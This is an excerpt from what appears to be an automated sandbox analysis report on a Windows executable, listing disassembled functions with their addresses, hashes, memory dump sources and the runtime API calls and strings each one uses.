                              • Opcode Fuzzy Hash: cf357945e07ecb3cb17188ebfda482f4cdcf1254a889b60975131b1a0cd5eef0
                              • Instruction Fuzzy Hash: 3B11E623E08105A6E764AB29D4006B8B7A0EF48B54FC48432EA1D673A1DF3CE845D7A0
                              Function 00007FF733AA0EC0 Relevance: 7.8, APIs: 5, Instructions: 299COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: fputcmemset
                              • String ID:
                              • API String ID: 947785774-0
                              • Opcode ID: c80d6053acda975e9b34af0d1c8f0dd865763ce2e8edafcc02733aa9a55d9469
                              • Instruction ID: f922200087de1d774a161ed8dddc72bced12dfa517dd3f3ff90ef747a9f31ca6
                              • Opcode Fuzzy Hash: c80d6053acda975e9b34af0d1c8f0dd865763ce2e8edafcc02733aa9a55d9469
                              • Instruction Fuzzy Hash: 6EB13A63F18281B6F7B1AF25C404B39B691AB00794F944235EA3D277C4DA3CE841E7A0
                              Function 00007FF733B3BE40 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 222COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: memcpy$wcslen
                              • String ID: basic_string::append
                              • API String ID: 1844840824-3811946249
                              • Opcode ID: cc6a8bfa9d563d39bd39aca3038998ccf4e10576a1a3cf86d9007a2988050de2
                              • Instruction ID: 0092b4be454794a0f7b59010d38f451a982f57550fbd031e06dae90399070eef
                              • Opcode Fuzzy Hash: cc6a8bfa9d563d39bd39aca3038998ccf4e10576a1a3cf86d9007a2988050de2
                              • Instruction Fuzzy Hash: F461E762B08A65A0EB64EB69D4001BCA321EB44FE4FD48632DE9D27BD4DF3DE442D351
                              Function 00007FF733B37A10 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 214stringCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: memcpy$strlen
                              • String ID: basic_string::append
                              • API String ID: 2619041689-3811946249
                              • Opcode ID: 507cef6d044ec1f790e54724dee95d3b08805e51ae2d52dc0af6bda044bd116f
                              • Instruction ID: b9e806ea81bcd6f1c9c31c4a37f2731116f50a7d62bda627afeb93882665128a
                              • Opcode Fuzzy Hash: 507cef6d044ec1f790e54724dee95d3b08805e51ae2d52dc0af6bda044bd116f
                              • Instruction Fuzzy Hash: 1E612862B08A65A1EF60AF25D45127CA321AB41FF4FC88131EE9D27BD1DE3ED442E711
                              Function 00007FF733AA72C0 Relevance: 7.7, APIs: 5, Instructions: 163synchronizationCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF733AA9FF0: TlsGetValue.KERNEL32 ref: 00007FF733AA9FFF
                                • Part of subcall function 00007FF733AA8150: GetTickCount64.KERNEL32 ref: 00007FF733AA817B
                                • Part of subcall function 00007FF733AA8150: WaitForMultipleObjects.KERNEL32(?,?,?,?,?,00000000,?,00000000,00007FF733AA75A6,?,00007FF733AA7A8C), ref: 00007FF733AA81AE
                              • ResetEvent.KERNEL32 ref: 00007FF733AA7326
                                • Part of subcall function 00007FF733AAA350: TlsGetValue.KERNEL32 ref: 00007FF733AAA361
                              • WaitForSingleObject.KERNEL32 ref: 00007FF733AA7353
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ValueWait$Count64EventMultipleObjectObjectsResetSingleTick
                              • String ID:
                              • API String ID: 3964425290-0
                              • Opcode ID: 81e3d504864a6940e027319d48b192f8dfd2bae9c8bedaf8e08d0fb165d98a00
                              • Instruction ID: 2e179fe539c826feb47b32219f0ad7029ce6df05c4aa379c01693b9eb72cbbdb
                              • Opcode Fuzzy Hash: 81e3d504864a6940e027319d48b192f8dfd2bae9c8bedaf8e08d0fb165d98a00
                              • Instruction Fuzzy Hash: E7514B23E0C11362FAF077A55845E7BD085AF80752F9A4431FD6DA26D1ED2EA841A2F2
                              Function 00007FF733AA83B0 Relevance: 7.6, APIs: 5, Instructions: 121COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Time$FileSystem
                              • String ID:
                              • API String ID: 2086374402-0
                              • Opcode ID: c936fbcecc0b84de1f8dd4bcfcb9bb0c1972789c36dbcbd1b0752dd44bf222de
                              • Instruction ID: 0d6d4c1e523b4e8a81fc2d83289134026075dbd9c8637f92e1353af3fb19d42a
                              • Opcode Fuzzy Hash: c936fbcecc0b84de1f8dd4bcfcb9bb0c1972789c36dbcbd1b0752dd44bf222de
                              • Instruction Fuzzy Hash: E541C833F0920257FBF57A249800B79A594EF54B56F884135EE2D5A2C4EE3CDC81E3A1
                              Function 00007FF733AA8260 Relevance: 7.6, APIs: 5, Instructions: 96threadCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: 263ad7ca8ebba6ba980b8c48042813822304dc923c095718753590996951de2c
                              • Instruction ID: 0966af0424bb18f7cf6fd67a14c56581c342c943ed9ba0794617cccfa9a5af5b
                              • Opcode Fuzzy Hash: 263ad7ca8ebba6ba980b8c48042813822304dc923c095718753590996951de2c
                              • Instruction Fuzzy Hash: D9318933F0550296FBF96B34D800B79A998EF4075AF984035DE2D56284EE3CDC85A2B1
                              Function 00007FF733B45D60 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 72stringCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: memcpystrlen
                              • String ID: basic_ios::clear$basic_string::_S_construct null not valid$vector::_M_default_append
                              • API String ID: 3412268980-1513041460
                              • Opcode ID: d88cd8d459d56e7bb09c546f4a47fcca875e4b43ad073202ec1cd9f98c1b91a9
                              • Instruction ID: 8f266c9713d7cde037105f2a26ccc9f17279988f5c26a94179c538bbf9f30923
                              • Opcode Fuzzy Hash: d88cd8d459d56e7bb09c546f4a47fcca875e4b43ad073202ec1cd9f98c1b91a9
                              • Instruction Fuzzy Hash: 74115B62F4DA1160FAB5BA26A8002B892914F84BE4FC84131EE9C673D6DF2CD541D772
                              Function 00007FF733B44960 Relevance: 7.6, APIs: 5, Instructions: 70stringCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: setlocale$memcpystrlen
                              • String ID:
                              • API String ID: 4096897932-0
                              • Opcode ID: 09df3b5d2a7da1ad60111d58924ae07ccf2e43f2a16fe9e09dfe5372a7fa79a5
                              • Instruction ID: 322fef36f462c8544462322a992868b3def869d86bd7f6403ba259973615c8bc
                              • Opcode Fuzzy Hash: 09df3b5d2a7da1ad60111d58924ae07ccf2e43f2a16fe9e09dfe5372a7fa79a5
                              • Instruction Fuzzy Hash: 5C11EF83B0859168FAA0BA626C01AFAD6915F85BD4FC84236FF5C2B393CD3CD545A324
                              Function 00007FF733AA6EA0 Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CriticalSection$Leave$EnterReleaseSemaphore
                              • String ID:
                              • API String ID: 2813224205-0
                              • Opcode ID: 84d9d0995420cacaed9a51d539446ebd803c790eed2a941183e4dd593ab4ff5f
                              • Instruction ID: 693989cffbb33e62d93c865ca1dc570020a16617767f0926ef845f648bbb919a
                              • Opcode Fuzzy Hash: 84d9d0995420cacaed9a51d539446ebd803c790eed2a941183e4dd593ab4ff5f
                              • Instruction Fuzzy Hash: 4F01D627B0660256F7756F2ABD80638D250AF99BB2F884130CE5D462A0ED2CE8C69710
                              Function 00007FF733AB5340 Relevance: 7.6, APIs: 5, Instructions: 53stringCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: setlocale$memcpystrlen
                              • String ID:
                              • API String ID: 4096897932-0
                              • Opcode ID: e9dd7094bbf1342bf207f920756da1baf2851d142694da4488283d1d521fba75
                              • Instruction ID: e3cadd2300fb143178dcc738f91133e6ebea5cbbf7f2c83570b808b12ee23435
                              • Opcode Fuzzy Hash: e9dd7094bbf1342bf207f920756da1baf2851d142694da4488283d1d521fba75
                              • Instruction Fuzzy Hash: 2A018F03F0965225EAB9BA632D16CBEC2916F4AFD0F888135BD2D7B796DD3CD0426314
                              Function 00007FF733B0FF70 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                              Download Yara Rule
                              APIs
                              • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF733AAEAC7), ref: 00007FF733B0FF90
                              • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF733AAEAC7), ref: 00007FF733B0FF94
                              • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF733AAEAC7), ref: 00007FF733B0FFA8
                              • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF733AAEAC7), ref: 00007FF733B0FFC0
                              • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF733AAEAC7), ref: 00007FF733B0FFC7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _errno
                              • String ID:
                              • API String ID: 2918714741-0
                              • Opcode ID: b6614a7fb5e8d915804aeb8b920a79afedfba170395ad29ad4a49d660df9c5f6
                              • Instruction ID: 26924e2ea6fc173c17197afdc73c3644c14e82b8b2be6387297c1fccbe897c37
                              • Opcode Fuzzy Hash: b6614a7fb5e8d915804aeb8b920a79afedfba170395ad29ad4a49d660df9c5f6
                              • Instruction Fuzzy Hash: 44F0A973B0521555F6623F26AE00728F6549F55BD5F898031CF4C47390DF3C28829722
                              Function 00007FF733AAB760 Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Process$CloseCurrentHandleOpen
                              • String ID:
                              • API String ID: 2750122171-0
                              • Opcode ID: 47a111b467e85369af11f47fbf46c68b4034ee5b047ac1926f327cb0c7d6b23b
                              • Instruction ID: 32d061fb2e6dcd80ea68dad83dc09161a1680aa9ffdd740bd53f5fe3702c40b4
                              • Opcode Fuzzy Hash: 47a111b467e85369af11f47fbf46c68b4034ee5b047ac1926f327cb0c7d6b23b
                              • Instruction Fuzzy Hash: 39F0B421E2A503A6FBF47F715850538D1D09F09B17FC40534D62EA53B0DE7CA488A231
                              Function 00007FF733B19320 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 303COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: basic_filebuf::xsgetn error reading the file
                              • API String ID: 0-3108371566
                              • Opcode ID: d5d05005051d5e024d4338972a3ebb8b012ab2469b395535e6e21cf3154706ff
                              • Instruction ID: 6a2171dfcda4721e6e699c5d0a65f976f27d505f2306a9b8cc898eb52730b49b
                              • Opcode Fuzzy Hash: d5d05005051d5e024d4338972a3ebb8b012ab2469b395535e6e21cf3154706ff
                              • Instruction Fuzzy Hash: 83B12552F19BC594EBA0AF3585043B9B352EB55F88F888231DE8D67385EF38D481E361
                              Function 00007FF733A9CD20 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 227memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualProtect.KERNEL32(00007FF733B7D040,00007FF733B7D048,00000001,?,?,?,?,00007FF8C6F6ADA0,00007FF733A91228,?,?,?,00007FF733A913E6), ref: 00007FF733A9CF1D
                              Strings
                              • Unknown pseudo relocation bit size %d., xrefs: 00007FF733A9D066
                              • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF733A9CF84
                              • Unknown pseudo relocation protocol version %d., xrefs: 00007FF733A9D072
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                              • API String ID: 544645111-1286557213
                              • Opcode ID: 8b3619f8fe32fa97f419f506c73f62ecdabae7a296719ea45974c1c64ccd1794
                              • Instruction ID: bc00060b1eed0f4325fa70ca29188e58e1b72c95fe0f715afb7ca2007ee803f1
                              • Opcode Fuzzy Hash: 8b3619f8fe32fa97f419f506c73f62ecdabae7a296719ea45974c1c64ccd1794
                              • Instruction Fuzzy Hash: BB91DA22E0995A66FAB0BB249C00B79F650AF52764FC44235ED5D377D8DE3CE842A360
                              Function 00007FF733AB1CE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78windowCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: FormatFreeLocalMessage
                              • String ID: basic_string: construction from null is not valid
                              • API String ID: 1427518018-2991274800
                              • Opcode ID: 9357d2eba0ff496b29dedb0eb8e0af70c400995cbb3669a2626f884ae5ec96ee
                              • Instruction ID: a8136a5cab0ecbce993f83f322b85281fc6c6c4b24a8d3c7ac9696c569c407df
                              • Opcode Fuzzy Hash: 9357d2eba0ff496b29dedb0eb8e0af70c400995cbb3669a2626f884ae5ec96ee
                              • Instruction Fuzzy Hash: A721B262A09A45A1EBB0BB21F8107ADB360EF44BC0FC44531DE8E17794DF3CE585A311
                              Function 00007FF733AA6F90 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45threadCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 00007FF733AA6FB0
                                • Part of subcall function 00007FF733AA6890: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,00007FF733AA6A23,?,?,00007FF733B7D040,00007FF733A91341), ref: 00007FF733AA68B8
                              • GetCurrentThreadId.KERNEL32 ref: 00007FF733AA6FE5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
